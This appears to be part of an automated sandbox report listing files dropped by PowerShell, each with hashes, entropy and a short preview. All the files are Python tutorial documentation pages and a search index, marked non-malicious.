                                                                                                    SHA1:70A4E7C92CD7A34539C024ECC7C79C38846E47AA
                                                                                                    SHA-256:6B1E63D1446BC75125FDFC4F7B1378CD3419D31D4FF5D0399ADCB9F63ABE0E63
                                                                                                    SHA-512:108D0B86737A1AF0EBD1189645EB697390E4B1923C54E1D66CCCF53D8D850BAAFCA3B352189AA684D8ADA433DE4713B9EED873EA037FE81EDF0808A0E245B7D8
                                                                                                    Malicious:false
                                                                                                    Preview:Search.setIndex({"docnames": ["about", "bugs", "c-api/abstract", "c-api/allocation", "c-api/apiabiversion", "c-api/arg", "c-api/bool", "c-api/buffer", "c-api/bytearray", "c-api/bytes", "c-api/call", "c-api/capsule", "c-api/cell", "c-api/code", "c-api/codec", "c-api/complex", "c-api/concrete", "c-api/contextvars", "c-api/conversion", "c-api/coro", "c-api/datetime", "c-api/descriptor", "c-api/dict", "c-api/exceptions", "c-api/file", "c-api/float", "c-api/frame", "c-api/function", "c-api/gcsupport", "c-api/gen", "c-api/hash", "c-api/import", "c-api/index", "c-api/init", "c-api/init_config", "c-api/intro", "c-api/iter", "c-api/iterator", "c-api/list", "c-api/long", "c-api/mapping", "c-api/marshal", "c-api/memory", "c-api/memoryview", "c-api/method", "c-api/module", "c-api/none", "c-api/number", "c-api/objbuffer", "c-api/object", "c-api/objimpl", "c-api/perfmaps", "c-api/refcounting", "c-api/reflection", "c-api/sequence", "c-api/set", "c-api/slice", "c-api/stable", "c-api/structures", "c-ap
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (434), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):25012
                                                                                                    Entropy (8bit):4.882657945412019
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:FqyxaEb6M265nbnRfYdi8vlxC4BJPNzaE8IM6764N:Fqyxa9Mbrp+ltlzaSM6764N
                                                                                                    MD5:52D41AD8C050C2C4C616AD58454C41B2
                                                                                                    SHA1:193D24A42C9F58F4B79EF589FA22203B8C508704
                                                                                                    SHA-256:8CAB2DC39C2BE3F6ADF04A1933424E692EB68681BCF483C28A4CFE25EA332E69
                                                                                                    SHA-512:30A8044EA5DA25F8892F994D06BE42BC82FC1B2A1366E3A6B1E04045DCE496F0716D87C718E29C05819FBD710C0574823C6140827F383C25C54D5260C12114A7
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="16. Appendix" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/appendix.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Interactive Mode: Error Handling: When an error occurs, the interpreter prints an error message and a stack trace. In interactive mode, it then returns to the primary prompt; when input came from a..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Interactive Mode: Error Handling: When an error occurs, the interp
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17730
                                                                                                    Entropy (8bit):4.8279810207897365
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:gpHqklHYaQ0nhTMVbGD+8IxP5l0MYXQcn1TM676dqEC:cqy4IlMVkoxPL0pxM6764N
                                                                                                    MD5:C9E89C531222719427E9F0B60853FB92
                                                                                                    SHA1:0180859B3A446B5734644A7AF45FE8573D475175
                                                                                                    SHA-256:5691617AAF1833D88460F79EB6BA32650647B3C642B6EA0F2097174FB35F2F46
                                                                                                    SHA-512:620A6EA0CE5AB682A6D84BB71BE3A3AD1879EE79DB78886DE43EEE1C122C9D6A48A8ECAC53F876637DB6506435A28013B23026BE82C3EBC4A70C9B654310C0E9
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="1. Whetting Your Appetite" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/appetite.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="If you do much work on computers, eventually you find that there.s some task you.d like to automate. For example, you may wish to perform a search-and-replace over a large number of text files, or ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="If you do much work on computers, eventually you
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (477), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):104306
                                                                                                    Entropy (8bit):4.789736902214165
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:oqyrvMj7SNPxBjfzRaozKb4mXKs2dZFtceXr5gevX83PIKh0AofuVRAdeyM7764N:Qy2bQ33Xc7rSoMzAg
                                                                                                    MD5:A28099AFB706CED80B9B0CCAAA963A57
                                                                                                    SHA1:5E4DD5D985F02E23197864AB5CA03C5D8B6C685A
                                                                                                    SHA-256:5549BA83A8F4BAC426AC67DFAE7B81EC721752E02F7A962991B595C82B3017E2
                                                                                                    SHA-512:D723E695AFBC82F29AD2CC73C15ACD48C4B16D0CC53F79717C4CCBA3DD94B38461D06EEF0F46A66081A31AF1F0110746ED98EB4FCF60B2A3A71FDA6708FAAC32
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="9. Classes" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/classes.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Classes provide a means of bundling data and functionality together. Creating a new class creates a new type of object, allowing new instances of that type to be made. Each class instance can have ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Classes provide a means of bundling data and functionality together.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (544), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135955
                                                                                                    Entropy (8bit):4.788144996619546
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:MqyMwp7M05/Lb5Gqo4tByTDa4lE2xS+TKGoYCmLVFg6LsvytnpulhN0WkSb+vqBA:Vwp987uqsmueStSiwpKg
                                                                                                    MD5:AEF48CCFF7BB9285EC2500EF9345880D
                                                                                                    SHA1:5C9D9F7C76BE1889219554B2F29F04927CB2873C
                                                                                                    SHA-256:10389AE331DCBD902FC1BFBA90A06355F8FD982469D8B1B7A4896F389D1BC2D1
                                                                                                    SHA-512:473818687EDDEDD29B0524C85104FCA70C4F54CB312F5A46B92CBD2D2F6217E5C1D544259D085560CEE43CA432E890095648D061252D4B0E4B3568B315A3D584
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="4. More Control Flow Tools" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/controlflow.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="As well as the while statement just introduced, Python uses a few more that we will encounter in this chapter. if Statements: Perhaps the most well-known statement type is the if statement. For exa..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="As well as the while statement just introduced, P
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (871), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):97972
                                                                                                    Entropy (8bit):4.811273765505366
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:8qywMoHORvCNupfDnO4kGmn+Q3OSr4cOhjNMyF9yYbBNLCi0C2NMOk+fTsuFt+FY:5GAIWnoGOg
                                                                                                    MD5:D9180331072BEDEE1B303D40B54AABE1
                                                                                                    SHA1:37486D7BC5D99AA3CD985882DE091E23DE63E74E
                                                                                                    SHA-256:6AA577294F0236A06EEB35E3B2D1B5D0DC7669FB4AE935669762EA92E0A45C9C
                                                                                                    SHA-512:9F8535B7A9FCE5E9A0F2EA947147C21548ECFE28720199919F97837343F4983FE434F83FA8DA730DAE7E4BA604D02271D91796E97BD0D223165D7809666A3893
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="5. Data Structures" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/datastructures.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This chapter describes some things you.ve learned about already in more detail, and adds some new things as well. More on Lists: The list data type has some more methods. Here are all of the method..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This chapter describes some things you.ve learned
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (633), with CRLF, CR line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):80300
                                                                                                    Entropy (8bit):4.827966433432982
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:jqy7MNljzzf662KEnp7mp3UHfOz9ig4QmB6SFhWtpKgJ2CknD84wcjMQn764N:SljnglGJ4B6aA27hV2g
                                                                                                    MD5:34433F4522A26CCC97F68888751133F7
                                                                                                    SHA1:029C6098DF35908931AF4A52C0E21489B32C81AB
                                                                                                    SHA-256:C4FA9301FF7B08AE2A517122388E40D64AE8190681017DEDB3F27A47F780B262
                                                                                                    SHA-512:C281BAC8D9CD94E15A101BF1746A7B19CFBD18323EBAC4DFB49B9E7E4C19F56A6AFFFA2D5D37B45B3CFB05469AE65BD72AFF0559250200BBF1DD745D81B235DD
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="8. Errors and Exceptions" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/errors.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Until now error messages haven.t been more than mentioned, but if you have tried out the examples you have probably seen some. There are (at least) two distinguishable kinds of errors: syntax error..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Until now error messages haven.t been more than ment
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (814), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):43845
                                                                                                    Entropy (8bit):4.949237808708209
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:aqyH43MwmsQFssg6egHc5xRgSwn8uLtrB3rIn49/ULEDdZt1x5QkgV9bMRk764N:aqyaMwmsQFssgBgHcjeSy8uLtN3UQcLn
                                                                                                    MD5:CF6F144D0540755DCF7538FF29EE97A0
                                                                                                    SHA1:195D8F00214ACB3836B72F8293BA4A7258722133
                                                                                                    SHA-256:0A2CF5D0420FF1DFF945EBAA3BED7395D02C2087704F8170ACCC3CC6D24942D6
                                                                                                    SHA-512:2109154D63775DACA83BDF89BD649D37D78E831416CD37949E02AD79F18AB3D41CFAE75A9333D29C77713328EFF77540AAE6C7C0D29CDF5041B2680A44E779D5
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="15. Floating Point Arithmetic: Issues and Limitations" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/floatingpoint.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Floating-point numbers are represented in computer hardware as base 2 (binary) fractions. For example, the decimal fraction 0.625 has value 6/10 + 2/100 + 5/1000, and in the same way the binary fra..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Floating-point numb
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (491), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):35042
                                                                                                    Entropy (8bit):4.9086825218459245
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:qHQHqklncqn5TMxHm7W/2hexAxaayRjEcIbBL3//IUtn0PuKRuntTMY76dqEC:qHEqynVtMxw38IbwcZMY764N
                                                                                                    MD5:C3F1FEC9966E98DEA09CB57C29BF0D07
                                                                                                    SHA1:29CB9DA6C0A3480E51899B3BF5E1BD2DDE2A9060
                                                                                                    SHA-256:BDC3E89128C20C48F2CDA8B93374536D7007B154E455E3137F667908B45145C4
                                                                                                    SHA-512:EA462B88F986470ABE79D183386D3A4F2E0BC42CA198D2371DF1D76DA4D76D2676317AE8BC28E7A14D318AF89541F56EF5E06D49E8613F37D20C15B77FDF864B
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="The Python Tutorial" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/index.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Python is an easy to learn, powerful programming language. It has efficient high-level data structures and a simple but effective approach to object-oriented programming. Python.s elegant syntax an..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Python is an easy to learn, powerful programming language. I
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (696), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):74772
                                                                                                    Entropy (8bit):4.877087174897302
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:jqyZfMHg8QVdcWttQ+0JCrBwqn1ZqmpeQBI8UI2To/9VrVWZyqmMd6MT764N:DIMv9/VRW8qmMdsg
                                                                                                    MD5:1EDA147A54914694322B76E5B6ED64F0
                                                                                                    SHA1:01B972B8465CC052DBFBF48E7F3C95E12AE1EA55
                                                                                                    SHA-256:BCAD794FC3EE9F9B432F5830E1E383B5FB9D9DF37CC47FA9EED365D4E2655F08
                                                                                                    SHA-512:66442C2496A1745C84516A2DEF8EE0CF03ADFC436F4684B27120FD6064CAB11AC7EF5339E9E8EEEF00304012DC9A8750407C4F146BFE3713CD501EB5192BD096
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="7. Input and Output" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/inputoutput.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="There are several ways to present the output of a program; data can be printed in a human-readable form, or written to a file for future use. This chapter will discuss some of the possibilities. Fa..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="There are several ways to present the output of a progra
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17742
                                                                                                    Entropy (8bit):4.848445653564974
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:09+HqklR7Y+nNTMlbcX7danxTM/76dqEC:9qyR7L5MtcX701M/764N
                                                                                                    MD5:1889403CC861246E419F5007B9871707
                                                                                                    SHA1:3A366FC8AEB7ACC93655E6DA49DFFD84050EBC97
                                                                                                    SHA-256:7734DB103140D23BDA28BA55A97FC2492E878C480A93EB625D3CE6EBE7C40E34
                                                                                                    SHA-512:DB3FD103C445AF933AD45AA44F68BBDE005418A2BE23B73F31C8EBEC7A5ADA0BD790540B58FD75E2A3717CFA415F13A5F56A59BC5C3D3AA042B9D765D9C1C81D
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="14. Interactive Input Editing and History Substitution" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/interactive.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Some versions of the Python interpreter support editing of the current input line and history substitution, similar to facilities found in the Korn shell and the GNU Bash shell. This is implemented..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Some versions of the
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (403), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):28382
                                                                                                    Entropy (8bit):4.876080500233324
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:J/1HqklA3VX7+9nwTM23NO487/H7HYsu9sOOYbaNOsdI3RnuIvzZ3VX77TnGTM9N:Hqy+5E+MKOFmadI3RnnR5XsMd764N
                                                                                                    MD5:56E528B855A25D2D642BAD3BC4F410C2
                                                                                                    SHA1:5D143A9D6B442B34EA08979258E3356BC4B3B0EA
                                                                                                    SHA-256:F6188CEA7D630180B20C4FFF29B221CC44976F5C911F43BA2E93914B7B0B8CAC
                                                                                                    SHA-512:1FF829D643D8B164F77C4858E6F4706C65328D0D7036B90E1E6C0739A4CA1ECAA169073AF86F4E4F3E666D7952D2253E7B2ABF68EF8194F2E98CA953B0A256BE
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="2. Using the Python Interpreter" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/interpreter.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Invoking the Interpreter: The Python interpreter is usually installed as/usr/local/bin/python3.12 on those machines where it is available; putting/usr/local/bin in your Unix shell.s search path mak..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Invoking the Interpreter: The Python inter
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (620), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):71636
                                                                                                    Entropy (8bit):4.88804380245398
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:DqyCML0d0Akyg+peikgtJLqK72aaOVloVodYdx6u0oKxrPZRXXIx/VcVBiW9nS+9:30GA8PwFM/2cg
                                                                                                    MD5:627CFB45B855B15C9D3F0D585E957856
                                                                                                    SHA1:BF087C95836190A26B41F1485253F7BF6E00DF55
                                                                                                    SHA-256:893D5E400AEF0AD8C56EF63D1E2BF7EB8DF17827C8DD96557FA355CF224A14DD
                                                                                                    SHA-512:B565434A904C58633F0183DC4DD717FCD8E3ADE1E3AC6564BAA6B1332FE04B06F4A0B2936DE8A2D90C0F5D49E12CA2CA2E565AECF89C6363AA60FC94CC95943C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="3. An Informal Introduction to Python" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/introduction.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="In the following examples, input and output are distinguished by the presence or absence of prompts (>>> and .): to repeat the example, you must type everything after the prompt, when the prompt ap..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="In the following examples, input an
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (611), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):72378
                                                                                                    Entropy (8bit):4.966137398015963
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:rqyYMIfaN6a3+4DQFTY5Czj6vvLXLjfmPnac0L8jhsGWlvFMj764N:Ua0VXPvUg
                                                                                                    MD5:804F0F2285FCD9E8793B41010DCCDC6A
                                                                                                    SHA1:6C8D5006D19BD63ACCF9DD333C2F39C7AA0A5C3F
                                                                                                    SHA-256:B7B7B89FEC9052277A46F73B717E28FF40EF3D5FAC78E903C911CFB2BB76A555
                                                                                                    SHA-512:3714D04C86EC4DA96C37C550FF032E83036DD5FB10ABE6DF83BD76A07BE128B7E07EAA38A48BD52591E960253F15594327759213A9D21D05439479E5B15D90BE
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="6. Modules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/modules.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="If you quit from the Python interpreter and enter it again, the definitions you have made (functions and variables) are lost. Therefore, if you want to write a somewhat longer program, you are bett..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="If you quit from the Python interpreter and enter it again, the defin
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1242), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):58199
                                                                                                    Entropy (8bit):4.888347965554106
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:oqyYMNe3FMGot9jl+Sxu0tZjBOERomaUfuVMT764N:OPrFkBg
                                                                                                    MD5:4C03289216E882F125E8A636376CB0EC
                                                                                                    SHA1:24B19E98A4005A4FB040B91DB442FEE2DBF34E58
                                                                                                    SHA-256:5AD425A47AA2CD1E9F11D8A6C9DBAA9AE3A0005DD1D5D69FB2764398A307AA00
                                                                                                    SHA-512:00C9F521541FE9D4A1A3FCB2868C6B11D56FC8F1ED6A6232466F7E6BCE62351113D14C311D7E44788F60F3B1D478DC919AC36030F868623EB96B30A66C9781D9
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="10. Brief Tour of the Standard Library" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/stdlib.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Operating System Interface: The os module provides dozens of functions for interacting with the operating system: Be sure to use the import os style instead of from os import *. This will keep os.o..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Operating System Interface: The os module
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (652), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):66590
                                                                                                    Entropy (8bit):4.859171275624418
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:YqywMl92x/d6PByDiAwmAw8vb0LKBn94FiuEM1764N:+yaoYg
                                                                                                    MD5:1634193777BBF692BA6AA4213ADB9B4D
                                                                                                    SHA1:8ECBBC7DF2DDF086A99A25ECE0DD85CAD005CDA9
                                                                                                    SHA-256:3CDBF84049C84154F14AB3CD9598794CB7E00B4C90C2D27FBDE28658E1DA92DD
                                                                                                    SHA-512:136ADB4C48A0B04E594606744B1B65711C8F8EAFEA61FCAB70B533AF5199DB5EEA85F1499AADD703A8FE75920A705928AE74B0B4A7BD708B68926D658936F58C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="11. Brief Tour of the Standard Library . Part II" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/stdlib2.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="This second tour covers more advanced modules that support professional programming needs. These modules rarely occur in small scripts. Output Formatting: The reprlib module provides a version of r..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="This second tour covers more
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (483), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):32793
                                                                                                    Entropy (8bit):4.859616472253739
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:qqydl9MceobNXQFDuESHBNA95Q4A87HJAlSAHKAMeO2a4AAX1QdPAxAuv5phmpM4:qqyZMRobNXODpSHBNA95dAwAYAqAMeO7
                                                                                                    MD5:96C9CF058B1E462CD60A1568778DFD7B
                                                                                                    SHA1:0FEB1B8B288F166ED242B8A991203AFB1CB45648
                                                                                                    SHA-256:035F694B6AF89EA32551C604EB593930CF2A716188748F61314AA2139B68BD87
                                                                                                    SHA-512:69076FA605F37AF92DC5B7E3F8D2F4B7488AB5415DDCC87D8D8ECCCCFA098A7182CCBE8CA610BCA7C534677C574ED70479A5684D99AFE88EB918B4084957F2F5
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="12. Virtual Environments and Packages" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/tutorial/venv.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Introduction: Python applications will often use packages and modules that don.t come as part of the standard library. Applications will sometimes need a specific version of a library, because the ..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Introduction: Python applications will ofte
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (373), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18091
                                                                                                    Entropy (8bit):4.894304890647055
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:mz5HqklbKVn9TMwwTzaHNU3iTIvpH7nhTMn76dqEC:iqybEpM5a8iapblMn764N
                                                                                                    MD5:6B74018D1A21CA822B45FC16C18BD7F4
                                                                                                    SHA1:E5609F4DDE13CF5B0E552CE1D4EFEBD560093C7B
                                                                                                    SHA-256:B91CAD3BEAD98DDAC21DF4C397F271A56494C7F24B454F35C501A2D0C6B09BE2
                                                                                                    SHA-512:5EEFE1127CBF38FEF62C2D6A37F78B2F273406204AA79D52AEF866A48DFB8B4C713D541D5B58954E1B8A3670EA47CAFEE639B6BB056590501881F7A41316EADC
                                                                                                    Malicious:false
